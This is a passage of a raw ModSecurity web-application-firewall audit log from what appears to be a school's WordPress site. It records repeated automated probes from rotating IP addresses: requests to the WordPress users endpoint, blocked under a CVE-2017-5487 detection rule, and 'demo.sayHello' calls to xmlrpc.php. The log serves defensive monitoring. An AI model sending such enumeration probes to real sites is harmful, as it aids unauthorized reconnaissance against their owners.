"CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804105699765 6585 (- - -) Stopwatch2: 1746804105699765 6585; combined=4642, p1=607, p2=3788, p3=38, p4=42, p5=99, sr=82, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d11dd7e-Z-- --f72fc37e-A-- [09/May/2025:22:25:10 +0700] aB4eVlqQ1nOVx9fWpZSxbQAAABI 103.236.140.4 56622 103.236.140.4 8181 --f72fc37e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f72fc37e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f72fc37e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804310629791 2574 (- - -) Stopwatch2: 1746804310629791 2574; combined=1433, p1=434, p2=962, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f72fc37e-Z-- --ba1d0846-A-- [09/May/2025:22:25:17 +0700] aB4eXVoC-7ITMWTA_c9eLwAAAMA 103.236.140.4 56628 103.236.140.4 8181 --ba1d0846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba1d0846-C-- demo.sayHello --ba1d0846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba1d0846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804317204319 5453 (- - -) Stopwatch2: 1746804317204319 5453; combined=4101, p1=489, p2=3336, p3=90, p4=57, p5=78, sr=69, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba1d0846-Z-- --590f1145-A-- [09/May/2025:22:35:05 +0700] aB4gqVoC-7ITMWTA_c9eVgAAANY 103.236.140.4 56750 103.236.140.4 8181 --590f1145-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --590f1145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --590f1145-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804905004849 3487 (- - -) Stopwatch2: 1746804905004849 3487; combined=1459, p1=498, p2=929, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --590f1145-Z-- --fa5f4457-A-- [09/May/2025:22:35:13 +0700] aB4gsVoC-7ITMWTA_c9eWQAAANE 103.236.140.4 56758 103.236.140.4 8181 --fa5f4457-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa5f4457-C-- demo.sayHello --fa5f4457-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa5f4457-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804913515206 4766 (- - -) Stopwatch2: 1746804913515206 4766; combined=3716, p1=459, p2=3057, p3=22, p4=23, p5=91, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa5f4457-Z-- --de54ff2b-A-- [09/May/2025:22:35:51 +0700] aB4g11oC-7ITMWTA_c9eXgAAAMY 103.236.140.4 56770 103.236.140.4 8181 --de54ff2b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --de54ff2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de54ff2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804951236380 2977 (- - -) Stopwatch2: 1746804951236380 2977; combined=1278, p1=441, p2=807, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de54ff2b-Z-- --bdc3712f-A-- [09/May/2025:22:35:58 +0700] aB4g3loC-7ITMWTA_c9eYAAAAMg 103.236.140.4 56774 103.236.140.4 8181 --bdc3712f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bdc3712f-C-- demo.sayHello --bdc3712f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc3712f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804958551459 5405 (- - -) Stopwatch2: 1746804958551459 5405; combined=4103, p1=519, p2=3367, p3=29, p4=32, p5=93, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc3712f-Z-- --81941c6c-A-- [09/May/2025:22:36:16 +0700] aB4g8C-fAO47ojYKsMr58wAAAEo 103.236.140.4 56784 103.236.140.4 8181 --81941c6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81941c6c-C-- demo.sayHello --81941c6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81941c6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804976269202 6270 (- - -) Stopwatch2: 1746804976269202 6270; combined=4582, p1=600, p2=3758, p3=32, p4=35, p5=93, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81941c6c-Z-- --029cb171-A-- [09/May/2025:22:36:47 +0700] aB4hDy-fAO47ojYKsMr59AAAAFM 103.236.140.4 56790 103.236.140.4 8181 --029cb171-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --029cb171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --029cb171-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805007060870 3159 (- - -) Stopwatch2: 1746805007060870 3159; combined=1353, p1=474, p2=849, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --029cb171-Z-- --6b64153e-A-- [09/May/2025:22:36:52 +0700] aB4hFB6q_ZMebht3q14k2wAAAJQ 103.236.140.4 56794 103.236.140.4 8181 --6b64153e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b64153e-C-- demo.sayHello --6b64153e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b64153e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805012718114 4865 (- - -) Stopwatch2: 1746805012718114 4865; combined=3776, p1=458, p2=3122, p3=21, p4=24, p5=88, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b64153e-Z-- --55825227-A-- [09/May/2025:22:36:52 +0700] aB4hFB6q_ZMebht3q14k3AAAAJU 103.236.140.4 56796 103.236.140.4 8181 --55825227-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --55825227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55825227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805012741650 1873 (- - -) Stopwatch2: 1746805012741650 1873; combined=938, p1=314, p2=586, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55825227-Z-- --60feaa74-A-- [09/May/2025:22:36:56 +0700] aB4hGB6q_ZMebht3q14k3gAAAIE 103.236.140.4 56802 103.236.140.4 8181 --60feaa74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60feaa74-C-- demo.sayHello --60feaa74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60feaa74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805016565456 4818 (- - -) Stopwatch2: 1746805016565456 4818; combined=3835, p1=450, p2=3076, p3=23, p4=26, p5=143, sr=67, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60feaa74-Z-- --87be7657-A-- [09/May/2025:22:37:23 +0700] aB4hMx6q_ZMebht3q14k4AAAAIs 103.236.140.4 56808 103.236.140.4 8181 --87be7657-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87be7657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87be7657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805043177826 2533 (- - -) Stopwatch2: 1746805043177826 2533; combined=1206, p1=406, p2=772, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87be7657-Z-- --de081a0a-A-- [09/May/2025:22:37:28 +0700] aB4hOB6q_ZMebht3q14k4gAAAIc 103.236.140.4 56812 103.236.140.4 8181 --de081a0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de081a0a-C-- demo.sayHello --de081a0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de081a0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805048798819 4851 (- - -) Stopwatch2: 1746805048798819 4851; combined=3909, p1=460, p2=3167, p3=26, p4=29, p5=164, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de081a0a-Z-- --faf69676-A-- [09/May/2025:22:37:51 +0700] aB4hTx6q_ZMebht3q14k5AAAAIA 103.236.140.4 56824 103.236.140.4 8181 --faf69676-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --faf69676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf69676-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805071977479 3024 (- - -) Stopwatch2: 1746805071977479 3024; combined=1293, p1=448, p2=815, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf69676-Z-- --ce83ca5b-A-- [09/May/2025:22:37:58 +0700] aB4hVh6q_ZMebht3q14k6AAAAIY 103.236.140.4 56834 103.236.140.4 8181 --ce83ca5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce83ca5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce83ca5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805078245900 2180 (- - -) Stopwatch2: 1746805078245900 2180; combined=1201, p1=386, p2=785, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce83ca5b-Z-- --6afd7001-A-- [09/May/2025:22:38:03 +0700] aB4hWx6q_ZMebht3q14k6QAAAIM 103.236.140.4 56838 103.236.140.4 8181 --6afd7001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6afd7001-C-- demo.sayHello --6afd7001-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6afd7001-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805083314802 5481 (- - -) Stopwatch2: 1746805083314802 5481; combined=4110, p1=527, p2=3351, p3=28, p4=32, p5=100, sr=72, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6afd7001-Z-- --c56c5925-A-- [09/May/2025:22:38:08 +0700] aB4hYFoC-7ITMWTA_c9ebAAAAMA 103.236.140.4 56846 103.236.140.4 8181 --c56c5925-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c56c5925-C-- demo.sayHello --c56c5925-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c56c5925-H-- Message: Warning. Match of "pmFromFile 